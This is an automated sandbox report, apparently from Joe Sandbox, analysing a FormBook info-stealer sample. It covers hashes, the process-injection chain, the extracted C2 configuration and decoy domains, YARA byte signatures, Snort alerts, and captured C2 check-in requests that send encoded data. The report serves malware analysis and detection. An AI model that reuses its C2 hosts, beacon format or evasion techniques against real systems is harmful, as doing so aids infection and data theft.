Loading ...

Play interactive tourEdit tour

Windows Analysis Report Fu94e0b1TR

Overview

General Information

Sample Name:Fu94e0b1TR (renamed file extension from none to exe)
Analysis ID:502374
MD5:6429aa83e4bc083b4f0b3f44b0d7950f
SHA1:0ead59881f054284f611accb61451ed1ffc818fc
SHA256:96c57ae661562e958e01bb0b490c09a0a51bb367931620223174963de88bdfcb
Tags:32exetrojan
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Uses netstat to query active network connections and open ports
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Self deletion via cmd delete
.NET source code contains potential unpacker
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • Fu94e0b1TR.exe (PID: 4628 cmdline: 'C:\Users\user\Desktop\Fu94e0b1TR.exe' MD5: 6429AA83E4BC083B4F0B3F44B0D7950F)
    • Fu94e0b1TR.exe (PID: 4840 cmdline: C:\Users\user\Desktop\Fu94e0b1TR.exe MD5: 6429AA83E4BC083B4F0B3F44B0D7950F)
    • Fu94e0b1TR.exe (PID: 2848 cmdline: C:\Users\user\Desktop\Fu94e0b1TR.exe MD5: 6429AA83E4BC083B4F0B3F44B0D7950F)
      • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • NETSTAT.EXE (PID: 3204 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
          • cmd.exe (PID: 1844 cmdline: /c del 'C:\Users\user\Desktop\Fu94e0b1TR.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.fis.photos/ef6c/"], "decoy": ["gicaredocs.com", "govusergroup.com", "conversationspit.com", "brondairy.com", "rjtherealest.com", "xn--9m1bq8wgkag3rjvb.com", "mylori.net", "softandcute.store", "ahljsm.com", "shacksolid.com", "weekendmusecollection.com", "gaminghallarna.net", "pgonline111.online", "44mpt.xyz", "ambrandt.com", "eddytattoo.com", "blendeqes.com", "upinmyfeels.com", "lacucinadesign.com", "docomoau.xyz", "xn--90armbk7e.online", "xzq585858.net", "kidzgovroom.com", "lhznqyl.press", "publicationsplace.com", "jakante.com", "csspadding.com", "test-testjisdnsec.store", "lafabriqueabeilleassurances.com", "clf010.com", "buybabysnuggle.com", "uzmdrmustafaalperaykanat.com", "levanttradegroup.com", "arcflorals.com", "kinglot2499.com", "freekagyans.com", "region10group.gmbh", "yeyelm744.com", "thehomedesigncentre.com", "vngc.xyz", "szesdkj.com", "charlottewright.online", "planetgreennetwork.com", "pacifica7.com", "analogueadapt.com", "sensorypantry.com", "narbaal.com", "restaurant-utopia.xyz", "golnay.com", "szyyglass.com", "redelirevearyseuiop.xyz", "goldsteelconstruction.com", "discovercotswoldcottages.com", "geniuseven.net", "apricitee.com", "stopmoshenik.online", "ya2gh.com", "instatechnovelz.com", "dbe648.com", "seifjuban.com", "conquershirts.store", "totalcovidtravel.com", "pamperotrabajo.com", "satellitphonestore.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19b77:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16aa9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bbc:$sqlite3step: 68 34 1C 7B E1
    • 0x16ad8:$sqlite3text: 68 38 2A 90 C5
    • 0x16bfd:$sqlite3text: 68 38 2A 90 C5
    • 0x16aeb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c13:$sqlite3blob: 68 53 D8 7F 8C
    00000000.00000002.277178151.0000000002B11000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
      00000012.00000002.513567456.0000000000A20000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
        Click to see the 24 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        6.2.Fu94e0b1TR.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          6.2.Fu94e0b1TR.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18d77:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19e1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          6.2.Fu94e0b1TR.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x15ca9:$sqlite3step: 68 34 1C 7B E1
          • 0x15dbc:$sqlite3step: 68 34 1C 7B E1
          • 0x15cd8:$sqlite3text: 68 38 2A 90 C5
          • 0x15dfd:$sqlite3text: 68 38 2A 90 C5
          • 0x15ceb:$sqlite3blob: 68 53 D8 7F 8C
          • 0x15e13:$sqlite3blob: 68 53 D8 7F 8C
          6.2.Fu94e0b1TR.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
            6.2.Fu94e0b1TR.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
            • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
            • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
            • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
            • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
            • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
            • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
            • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
            • 0x19b77:$sequence_8: 3C 54 74 04 3C 74 75 F4
            • 0x1ac1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
            Click to see the 8 entries

            Sigma Overview

            No Sigma rule has matched

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: 00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.fis.photos/ef6c/"], "decoy": ["gicaredocs.com", "govusergroup.com", "conversationspit.com", "brondairy.com", "rjtherealest.com", "xn--9m1bq8wgkag3rjvb.com", "mylori.net", "softandcute.store", "ahljsm.com", "shacksolid.com", "weekendmusecollection.com", "gaminghallarna.net", "pgonline111.online", "44mpt.xyz", "ambrandt.com", "eddytattoo.com", "blendeqes.com", "upinmyfeels.com", "lacucinadesign.com", "docomoau.xyz", "xn--90armbk7e.online", "xzq585858.net", "kidzgovroom.com", "lhznqyl.press", "publicationsplace.com", "jakante.com", "csspadding.com", "test-testjisdnsec.store", "lafabriqueabeilleassurances.com", "clf010.com", "buybabysnuggle.com", "uzmdrmustafaalperaykanat.com", "levanttradegroup.com", "arcflorals.com", "kinglot2499.com", "freekagyans.com", "region10group.gmbh", "yeyelm744.com", "thehomedesigncentre.com", "vngc.xyz", "szesdkj.com", "charlottewright.online", "planetgreennetwork.com", "pacifica7.com", "analogueadapt.com", "sensorypantry.com", "narbaal.com", "restaurant-utopia.xyz", "golnay.com", "szyyglass.com", "redelirevearyseuiop.xyz", "goldsteelconstruction.com", "discovercotswoldcottages.com", "geniuseven.net", "apricitee.com", "stopmoshenik.online", "ya2gh.com", "instatechnovelz.com", "dbe648.com", "seifjuban.com", "conquershirts.store", "totalcovidtravel.com", "pamperotrabajo.com", "satellitphonestore.com"]}
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 6.2.Fu94e0b1TR.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.Fu94e0b1TR.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Fu94e0b1TR.exe.3c84fc0.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Fu94e0b1TR.exe.3c3ada0.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.513567456.0000000000A20000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.333414635.000000000FAD6000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.513760624.0000000000A50000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.311554346.000000000FAD6000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.371224121.0000000000F20000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.282740924.0000000003B19000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.512579124.00000000003C0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.371120002.0000000000CF0000.00000040.00020000.sdmp, type: MEMORY
            Source: 6.2.Fu94e0b1TR.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: Fu94e0b1TR.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: Fu94e0b1TR.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: netstat.pdbGCTL source: Fu94e0b1TR.exe, 00000006.00000002.371455073.0000000001150000.00000040.00020000.sdmp
            Source: Binary string: netstat.pdb source: Fu94e0b1TR.exe, 00000006.00000002.371455073.0000000001150000.00000040.00020000.sdmp
            Source: Binary string: wntdll.pdbUGP source: Fu94e0b1TR.exe, 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, NETSTAT.EXE, 00000012.00000002.515622767.0000000002D20000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: Fu94e0b1TR.exe, NETSTAT.EXE
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 4x nop then pop ebx6_2_00406ABB
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 4x nop then pop edi6_2_0040C37C
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 4x nop then pop edi6_2_0040C3E9
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4x nop then pop ebx18_2_003C6ABB
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4x nop then pop edi18_2_003CC37C
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4x nop then pop edi18_2_003CC3E9

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49795 -> 64.190.62.111:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49795 -> 64.190.62.111:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49795 -> 64.190.62.111:80
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49797 -> 192.0.78.24:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49797 -> 192.0.78.24:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49797 -> 192.0.78.24:80
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\explorer.exeDomain query: www.instatechnovelz.com
            Source: C:\Windows\explorer.exeNetwork Connect: 172.65.227.72 80Jump to behavior
            Source: C:\Windows\explorer.exeDomain query: www.apricitee.com
            Source: C:\Windows\explorer.exeDomain query: www.shacksolid.com
            Source: C:\Windows\explorer.exeNetwork Connect: 64.190.62.111 80Jump to behavior
            Source: C:\Windows\explorer.exeDomain query: www.brondairy.com
            Uses netstat to query active network connections and open portsShow sources
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
            C2 URLs / IPs found in malware configurationShow sources
            Source: Malware configuration extractorURLs: www.fis.photos/ef6c/
            Source: Joe Sandbox ViewASN Name: NBS11696US NBS11696US
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: global trafficHTTP traffic detected: GET /ef6c/?BJB=7nO80D&yrTlglv8=KSHN/72DEJPyd/OuGOIXNFBSZoOhZSSqcZP1Rqc2bg8KEPsXLZdPsQK+HlsXn3Jp1PaC HTTP/1.1Host: www.apricitee.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /ef6c/?yrTlglv8=JeohSOzXiZYIapiQlSWyFy7AWxQU0a2IMxMIOt5NBtSaZYcWimwRehmIZ/KtIrBMaY3r&BJB=7nO80D HTTP/1.1Host: www.shacksolid.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: Joe Sandbox ViewIP Address: 64.190.62.111 64.190.62.111
            Source: Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
            Source: Fu94e0b1TR.exe, 00000000.00000003.252645289.00000000059A1000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: Fu94e0b1TR.exe, 00000000.00000002.277178151.0000000002B11000.00000004.00000001.sdmpString found in binary or memory: http://www.collada.org/2005/11/COLLADASchema9Done
            Source: Fu94e0b1TR.exe, 00000000.00000002.285145562.0000000005964000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: Fu94e0b1TR.exe, 00000000.00000003.257245826.000000000599C000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/%
            Source: Fu94e0b1TR.exe, 00000000.00000003.257106060.0000000005999000.00000004.00000001.sdmp, Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: Fu94e0b1TR.exe, 00000000.00000003.260583802.000000000596F000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
            Source: Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: Fu94e0b1TR.exe, 00000000.00000003.260583802.000000000596F000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlr
            Source: Fu94e0b1TR.exe, 00000000.00000003.259708004.000000000596F000.00000004.00000001.sdmp, Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
            Source: Fu94e0b1TR.exe, 00000000.00000003.259327134.0000000005999000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.htmlx
            Source: Fu94e0b1TR.exe, 00000000.00000003.259563222.0000000005999000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers5
            Source: Fu94e0b1TR.exe, 00000000.00000003.259630894.0000000005999000.00000004.00000001.sdmp, Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: Fu94e0b1TR.exe, 00000000.00000003.267018453.0000000005999000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersK
            Source: Fu94e0b1TR.exe, 00000000.00000003.258524788.0000000005999000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersP
            Source: Fu94e0b1TR.exe, 00000000.00000003.267018453.0000000005999000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersiva
            Source: Fu94e0b1TR.exe, 00000000.00000003.259708004.000000000596F000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com7
            Source: Fu94e0b1TR.exe, 00000000.00000003.260965748.000000000596F000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comD
            Source: Fu94e0b1TR.exe, 00000000.00000003.260965748.000000000596F000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comF
            Source: Fu94e0b1TR.exe, 00000000.00000003.259708004.000000000596F000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comFk
            Source: Fu94e0b1TR.exe, 00000000.00000003.260965748.000000000596F000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comI.TTF
            Source: Fu94e0b1TR.exe, 00000000.00000003.259708004.000000000596F000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comR.TTF
            Source: Fu94e0b1TR.exe, 00000000.00000003.260583802.000000000596F000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comalicu
            Source: Fu94e0b1TR.exe, 00000000.00000003.260965748.000000000596F000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comd
            Source: Fu94e0b1TR.exe, 00000000.00000003.260965748.000000000596F000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comdito
            Source: Fu94e0b1TR.exe, 00000000.00000003.260965748.000000000596F000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comessed
            Source: Fu94e0b1TR.exe, 00000000.00000003.260583802.000000000596F000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comk
            Source: Fu94e0b1TR.exe, 00000000.00000003.259708004.000000000596F000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comt
            Source: Fu94e0b1TR.exe, 00000000.00000003.259708004.000000000596F000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comtuta
            Source: Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
            Source: Fu94e0b1TR.exe, 00000000.00000003.252060604.000000000599A000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: Fu94e0b1TR.exe, 00000000.00000003.252293628.0000000005999000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/
            Source: Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: Fu94e0b1TR.exe, 00000000.00000003.263851133.0000000005999000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/
            Source: Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: Fu94e0b1TR.exe, 00000000.00000003.263851133.0000000005999000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/k
            Source: Fu94e0b1TR.exe, 00000000.00000003.264392875.000000000599E000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/denQ
            Source: Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: Fu94e0b1TR.exe, 00000000.00000003.264185208.000000000597A000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htmNormaldk
            Source: Fu94e0b1TR.exe, 00000000.00000003.263989086.0000000005999000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htmS
            Source: Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: Fu94e0b1TR.exe, 00000000.00000003.254233996.0000000005963000.00000004.00000001.sdmp, Fu94e0b1TR.exe, 00000000.00000003.254492265.000000000596C000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: Fu94e0b1TR.exe, 00000000.00000003.254233996.0000000005963000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/(
            Source: Fu94e0b1TR.exe, 00000000.00000003.254233996.0000000005963000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/)
            Source: Fu94e0b1TR.exe, 00000000.00000003.254233996.0000000005963000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp//lpk
            Source: Fu94e0b1TR.exe, 00000000.00000003.254233996.0000000005963000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/7
            Source: Fu94e0b1TR.exe, 00000000.00000003.254233996.0000000005963000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/D
            Source: Fu94e0b1TR.exe, 00000000.00000003.254233996.0000000005963000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0ro
            Source: Fu94e0b1TR.exe, 00000000.00000003.254233996.0000000005963000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/ch
            Source: Fu94e0b1TR.exe, 00000000.00000003.254233996.0000000005963000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
            Source: Fu94e0b1TR.exe, 00000000.00000003.254492265.000000000596C000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/D
            Source: Fu94e0b1TR.exe, 00000000.00000003.254492265.000000000596C000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/k
            Source: Fu94e0b1TR.exe, 00000000.00000003.254233996.0000000005963000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/ms
            Source: Fu94e0b1TR.exe, 00000000.00000003.253358837.0000000005963000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/nly
            Source: Fu94e0b1TR.exe, 00000000.00000003.253958296.0000000005968000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/nt
            Source: Fu94e0b1TR.exe, 00000000.00000003.254492265.000000000596C000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/t
            Source: Fu94e0b1TR.exe, 00000000.00000003.254233996.0000000005963000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/v
            Source: Fu94e0b1TR.exe, 00000000.00000003.253827230.000000000596D000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/y
            Source: Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
            Source: Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
            Source: Fu94e0b1TR.exe, 00000000.00000003.252359089.0000000005999000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.coma-e
            Source: Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
            Source: Fu94e0b1TR.exe, 00000000.00000003.261217392.000000000596E000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.de
            Source: Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: Fu94e0b1TR.exe, 00000000.00000003.261217392.000000000596E000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deMT
            Source: Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: NETSTAT.EXE, 00000012.00000002.518424149.00000000033D2000.00000004.00020000.sdmpString found in binary or memory: https://flow.page/rjdarealest/ef6c/?BJB=7nO80D&yrTlglv8=yyRuLH34I
            Source: NETSTAT.EXE, 00000012.00000002.518424149.00000000033D2000.00000004.00020000.sdmpString found in binary or memory: https://sedo.com/search/details/?partnerid=324561&language=e&domain=shacksolid.com&origin=sales_land
            Source: unknownDNS traffic detected: queries for: www.apricitee.com
            Source: global trafficHTTP traffic detected: GET /ef6c/?BJB=7nO80D&yrTlglv8=KSHN/72DEJPyd/OuGOIXNFBSZoOhZSSqcZP1Rqc2bg8KEPsXLZdPsQK+HlsXn3Jp1PaC HTTP/1.1Host: www.apricitee.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /ef6c/?yrTlglv8=JeohSOzXiZYIapiQlSWyFy7AWxQU0a2IMxMIOt5NBtSaZYcWimwRehmIZ/KtIrBMaY3r&BJB=7nO80D HTTP/1.1Host: www.shacksolid.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

            E-Banking Fraud:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 6.2.Fu94e0b1TR.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.Fu94e0b1TR.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Fu94e0b1TR.exe.3c84fc0.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Fu94e0b1TR.exe.3c3ada0.3.raw.unpack, type: UNPACKEDPE
